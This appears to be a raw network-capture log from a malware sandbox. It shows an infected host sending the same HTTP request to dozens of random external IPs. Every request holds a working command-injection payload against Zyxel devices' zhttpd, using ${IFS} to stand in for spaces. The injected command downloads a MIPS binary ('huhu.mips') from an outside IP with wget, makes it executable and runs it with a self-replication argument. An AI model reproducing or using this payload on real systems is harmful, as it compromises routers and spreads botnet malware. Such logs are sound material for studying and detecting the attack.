                                                Jan 29, 2024 07:07:50.383706093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4806192.168.2.235156819.231.109.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383739948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4807192.168.2.2348634147.159.23.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383804083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4808192.168.2.233332431.174.51.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383825064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4809192.168.2.233787419.176.167.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383855104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4810192.168.2.2359396208.77.62.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383917093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4811192.168.2.23362804.66.144.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.383949995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4812192.168.2.234268624.13.64.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384002924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4813192.168.2.233298086.114.245.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384028912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4814192.168.2.233496243.187.238.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384073973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4815192.168.2.2351962198.10.229.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384134054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4816192.168.2.234655897.164.186.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384159088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4817192.168.2.2344132158.202.49.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384195089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4818192.168.2.2360998109.238.160.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384249926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4819192.168.2.2353124180.79.42.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384277105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4820192.168.2.233833464.158.34.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384295940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4821192.168.2.233928886.19.7.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384331942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4822192.168.2.234598289.164.20.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384361029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4823192.168.2.235380867.218.51.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384422064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4824192.168.2.2353868155.149.80.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384454966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4825192.168.2.2353744102.127.153.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384483099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4826192.168.2.2351166123.112.31.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384529114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4827192.168.2.233451895.39.215.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384563923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4828192.168.2.235224823.200.13.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384625912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4829192.168.2.2359456204.150.102.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384650946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4830192.168.2.2349404115.5.223.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384694099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4831192.168.2.2352286137.200.26.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384735107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4832192.168.2.2338400207.220.32.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384788036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4833192.168.2.2355866179.43.172.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384803057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4834192.168.2.235591444.41.74.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384851933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4835192.168.2.2360828211.226.75.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384876966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4836192.168.2.2340854134.238.23.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384918928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4837192.168.2.2358076119.205.235.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384958982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4838192.168.2.2336180174.30.10.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.384974957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4839192.168.2.2354486204.89.187.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385020971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4840192.168.2.2344478165.184.248.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385081053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4841192.168.2.2341040207.254.121.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385108948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4842192.168.2.2359594137.206.168.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385137081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4843192.168.2.2333178100.42.240.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385171890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4844192.168.2.236086825.219.230.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385188103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4845192.168.2.2360932190.4.82.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385241032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4846192.168.2.2353226181.173.30.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385270119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4847192.168.2.235625638.219.224.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385301113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4848192.168.2.2333568126.221.42.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385358095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4849192.168.2.23519062.149.34.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385402918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4850192.168.2.2349142115.197.156.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385463953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4851192.168.2.233763696.192.85.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385504961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4852192.168.2.2346004115.44.246.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385555029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4853192.168.2.2360008168.17.84.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385585070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4854192.168.2.2340604158.45.55.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385631084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4855192.168.2.235213432.153.13.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385689974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4856192.168.2.2339174100.24.152.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385731936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4857192.168.2.234340263.119.225.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385771036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4858192.168.2.235440899.181.199.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385811090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4859192.168.2.234845820.252.89.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385862112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4860192.168.2.233318451.244.129.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385905981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4861192.168.2.2350250161.66.45.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385938883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4862192.168.2.234679859.17.137.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385968924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4863192.168.2.2358062184.148.246.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.385992050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4864192.168.2.2332846126.89.252.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386043072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4865192.168.2.235114887.223.108.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386065960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4866192.168.2.2358868139.226.83.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386104107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4867192.168.2.2354416204.15.92.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386154890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4868192.168.2.2353908138.50.131.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:50.386182070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4869192.168.2.234785478.223.115.103443
                                                TimestampBytes transferredDirectionData
